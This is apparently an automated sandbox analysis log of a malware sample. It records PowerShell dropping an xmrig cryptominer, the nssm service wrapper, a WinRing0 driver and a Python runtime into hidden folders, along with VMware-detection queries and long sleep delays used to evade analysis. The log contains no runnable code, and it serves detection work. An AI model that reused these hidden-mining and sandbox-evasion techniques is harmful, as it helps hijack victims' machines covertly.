                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\.logstxt\xmrig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\ProgramData\.logstxt\xmrig.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\.logstxt\xmrig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\ProgramData\.logstxt\xmrig.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\.logstxt\xmrig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\ProgramData\.logstxt\xmrig.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACC50F6D sldt word ptr [eax]15_2_00007FFAACC50F6D
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: OpenServiceW,GetServiceDisplayNameW,GetServiceKeyNameW,GetLastError,GetLastError,EnumServicesStatusW,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusW,GetLastError,GetProcessHeap,HeapFree,GetLastError,_snwprintf_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,19_2_000000014000FF70
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599782Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3405Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5095Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4581Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3372Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 559Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4996Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4688Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5798
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3826
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_wmi.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_ctypes.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_multiprocessing.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Scripts\pip.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_overlapped.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\t64-arm.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA384.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli-arm64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_socket.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\vcruntime140_1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\ProgramData\.logstxt\nvrtc-builtins64_124.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\t32.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_ssl.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Protocol\_scrypt.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\w32.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_MD4.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_poly1305.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_queue.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA512.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA224.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_ed25519.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_MD5.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\w64-arm.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nvrtc-builtins64_124.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_sqlite3.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\select.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_decimal.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli-32.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Math\_modexp.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_x25519.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Scripts\normalizer.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\unicodedata.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\w64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_ec_ws.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Scripts\pip3.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_keccak.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_bz2.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA1.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Scripts\pip3.12.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\sqlite3.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_ed448.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Scripts\wheel.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA256.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WinRing0x64.sysJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\winsound.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_lzma.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli-64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_elementtree.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_RIPEMD160.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_hashlib.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_ghash_portable.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\t64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_asyncio.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_msi.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_uuid.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_MD2.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyops\_zoneinfo.pydJump to dropped file
                    Source: C:\ProgramData\.logstxt\nssm.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_19-9590
                    Source: C:\ProgramData\.logstxt\nssm.exeAPI coverage: 3.4 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2268Thread sleep count: 3000 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2268Thread sleep count: 3405 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -599782s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -599657s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 3372 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 559 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep count: 4996 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep count: 4688 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep count: 5798 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep count: 3826 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599782Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: powershell.exe, 00000009.00000002.2048314360.00000236FDDA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                    Source: svchost.exe, 00000007.00000002.3755067786.0000026F30072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.3755067786.0000026F30072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: powershell.exe, 00000004.00000002.1330327658.000001DCEBE6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.3754353212.0000026F3002B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: svchost.exe, 00000007.00000002.3754599152.0000026F3004B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: xmrig.exe, 00000019.00000002.3755773342.00000214C087A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
